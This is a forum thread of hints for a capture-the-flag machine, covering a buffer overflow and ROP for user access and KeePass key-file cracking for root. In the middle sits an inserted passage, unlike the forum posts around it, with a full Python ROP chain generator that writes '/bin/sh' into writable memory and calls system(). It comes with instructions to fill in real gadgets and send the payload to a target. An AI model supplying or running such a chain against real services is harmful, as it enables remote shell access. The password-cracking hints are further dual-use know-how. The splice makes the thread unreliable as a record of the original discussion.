It seems the address for the string I’d like to use for the sm call to get a shell keeps changing (inside of l*bc). Any tips on how to access that string during runtime? I can access the upe and execute it fine, since that addr doesn’t change, just the strings in l*bc keep moving around.
Don’t try to guess the position of a string in a library the version of which you can’t even know (and hence also not where you find the string in it).
That actually makes a lot of sense, now that you say it, LOL. I did give up on that path. I was able to get what I need into another place (R9) but now trying to figure out how to get that into the s****m call. Of course, I also can put it all over the stack, but not sure how to get a pointer to one of those spots into RDI.
Is that more on the right track?
Even though I don’t know where you got something into R9 (I took a different approach, apparently), and even though I don’t find a way to get it back out of there, I dare say the general idea is good.
Also, it might be a good idea to actually take a look at the disassembled code instead of just relying on tools to find gadgets.
You can of course also PM me if you don’t want to spam the boards.
I have done some enumeration and discovered the version of the web server and also some stuff on a higher port. I have seen a lot of posts here about some binary input but I really don’t have any idea what and how.
So please, can someone give me a nudge or send me a PM with some sites where I can read more about this technique?
Can anyone help me with the master password for kee****? I tried bruteforcing for hours but I didn’t get anything. Please help me.
When you extract the hash, don’t forget the 6 files; you have to add them, then the master key will be obtained quickly.
I only included one of the pictures as the key file, is that the correct way?
Each picture, when extracted with KP, gives you a different hash.
the kp*$$2jo*n tool with switch -k would only allow one key file
or I should include all the picture file with the -k switch?
e.g. kp*$$2jo*n -k 1.jpg 2.jpg 3.jpg MyP@sswd.kx
Who said it is one line of command? maybe each picture needs to be run separately!
The binary here is actually a pretty good example of why you shouldn’t always rely on automated tools because they (usually) only think of one way to exploit a binary and might miss more “creative” ways. And it’s short enough that you can actually read the whole disassembly without getting bored.
Disassemble the code and take a look at the disassembly. A good disassembler will tell you what functions get called from what places and also what functions don’t get called.
Got everything; authenticating as root gives me authentication failure; can someone help?
Hi
Like access point, got the password and an interactive shell, but got authentication failure.
Can someone DM me for hint?
Edit: rooted! Copy-paste error!
user: it was fun to develop exploit using the pwn python lib. Learned a lot!
root: I don’t understand why I couldn’t find the .kx thing using hact. But it worked right away using the other option. I even trimmed the part of the format ha**ct didn’t like, as per several articles on the internet, but it just didn’t work. Anyone got the pass using ha**c*t?
The box is cool. BOF is always one of a kind until you solve the kind, then it becomes easy (thinking of creator :P). Root is quite straightforward. The only hint I can provide for user is don’t try to leak something which is already there. Find a way to make it your butler and accept your commands.
I have developed a buffer overf. exploit that works locally, but I cannot get it to work on the remote system. I am using the address of /bin/s* that I found with gdb. I am guessing the address is not the same on the remote machine? Based on other hints it seems that we need to provide in our input what needs to be executed by sy***m, but I am not sure how to go about that.
So I’ve successfully created a R*P attack to get user, and have the Root Password. But it doesn’t let me use it to ssh into root. Am I going about this wrong?
Edit: Got it.
User:
Go through the very useful Ellingson writeup (Hack The Box - Ellingson - 0xRick’s Blog) and use it as a guide. This R*P is easier, but tricky because the string you want to exist doesn’t. Figuring out how to write to memory is hard.
Root:
Jn with k*s2jn was the way. Don’t forget the IMGs. SSH isn’t the only way up.
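The user-part hints above (the string you want to pass to sy***m doesn’t exist in the binary, and the /bin/s* address found locally in gdb is not valid remotely because the l*bc mapping is randomized) both come down to the same technique: write the string yourself into a writable address inside the non-PIE binary (for example an unused slot in .bss) using a write-what-where gadget, then pop that address into RDI and return into system@plt. Below is an added example of building such a chain with nothing but struct; it is not code from the thread, the box or the Ellingson writeup, and every address in it (POP_RDI_RET, POP_RSI_RET, MOV_RDI_RSI_RET, RET, SYSTEM_PLT, WRITABLE, PAD) is a made-up placeholder that you replace with what your own disassembly or gadget search gives you. Because nothing in the chain lives in l*bc, no remote leak is required.

```python
"""ROP chain that writes a command string into writable memory, then calls
system() on it.  Added example for a non-PIE x86-64 binary with NX and no
canary, built with struct only (no pwntools).  All addresses are constructed
placeholders, not gadgets from any real binary."""
import struct

# --- Hypothetical addresses (assumptions for illustration only) ---
POP_RDI_RET = 0x401203      # pop rdi ; ret
POP_RSI_RET = 0x401205      # pop rsi ; ret
MOV_RDI_RSI_RET = 0x401210  # mov qword ptr [rdi], rsi ; ret   (write-what-where)
RET = 0x401016              # plain ret, used to keep rsp 16-byte aligned for system()
SYSTEM_PLT = 0x401030       # system@plt; the loader resolves the l*bc address for us
WRITABLE = 0x404060         # unused, writable slot in .bss of the binary
PAD = 120                   # bytes from the start of the buffer up to the saved RIP


def p64(value: int) -> bytes:
    """Pack one little-endian 64-bit word, the unit a ROP chain is made of."""
    return struct.pack("<Q", value)


def to_qwords(data: bytes) -> list:
    """NUL-terminate data and split it into little-endian 8-byte words.

    The write gadget stores a full 8 bytes, so embedded NULs are fine here;
    the overflow primitive itself must tolerate them (read()/recv() do,
    strcpy()-style copies do not)."""
    data += b"\0"
    data += b"\0" * (-len(data) % 8)
    return [struct.unpack("<Q", data[i:i + 8])[0] for i in range(0, len(data), 8)]


def write_chain(dst: int, data: bytes) -> bytes:
    """For every 8-byte word: rdi = dst + 8*i, rsi = word, *rdi = rsi."""
    chain = b""
    for i, word in enumerate(to_qwords(data)):
        chain += p64(POP_RDI_RET) + p64(dst + 8 * i)
        chain += p64(POP_RSI_RET) + p64(word)
        chain += p64(MOV_RDI_RSI_RET)
    return chain


def build_payload(cmd: bytes = b"/bin/sh", align: bool = True) -> bytes:
    """Padding, then the write chain, then pop rdi = WRITABLE and return into system().

    align inserts one extra `ret` so that rsp is 16-byte aligned when system()
    runs; glibc's system() uses movaps and crashes otherwise.  Whether you need
    it depends on the stack layout at the overflow site, so check in gdb."""
    chain = write_chain(WRITABLE, cmd)
    if align:
        chain += p64(RET)
    chain += p64(POP_RDI_RET) + p64(WRITABLE) + p64(SYSTEM_PLT)
    return b"A" * PAD + chain


def chain_words(payload: bytes) -> list:
    """Decode the chain part of a payload back into qwords for sanity-checking."""
    chain = payload[PAD:]
    return [struct.unpack("<Q", chain[i:i + 8])[0] for i in range(0, len(chain), 8)]


if __name__ == "__main__":
    payload = build_payload(b"/bin/sh")
    for word in chain_words(payload):
        print(hex(word))
    # Send `payload` to the vulnerable service (e.g. over a socket or to stdin).
```

To use it against a target, replace the placeholder constants with gadgets found in the disassembly, verify PAD by crashing the binary under gdb with a cyclic pattern, and send the returned bytes followed by whatever terminator the service expects. Keep the command short: each 8 bytes of string costs five qwords of chain, and the input buffer has a finite size.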
Thought this is an easy box…
Anyway, I’m completely new to binary exploitation (‘how to use gdb?’ level kind of new…)
and having hard time to even run the app in gdb.
Hitting ‘r’ or ‘run’ returns a “Warning: not running” msg and no interaction at all. Is it me, or does my setup have no clue at all?
It’s easy, if you have a background in reverse engineering. Reveng the binary, take a look at the code and it’s immediately obvious what you have to do. If, and only if, you know your assembly. Otherwise, it’s a nightmare. The usual ROP tools fail to work or only tell you half the story needed for the binary, it’s not exactly a standard “pop the rdi and return to the syscall” ROP chain. Not too terrible, but IMO at least above the paygrade of a box suitable to a beginner of reversing.
The root part on the other hand is trivial and mostly “use the right tools and go get a coffee”.
Hi,
I have an issue where I can’t leak the libc address via the remote port to gain a shell. Locally all works, but on remote I can’t get output after the payload or BOF is sent.
PM if someone can solve it.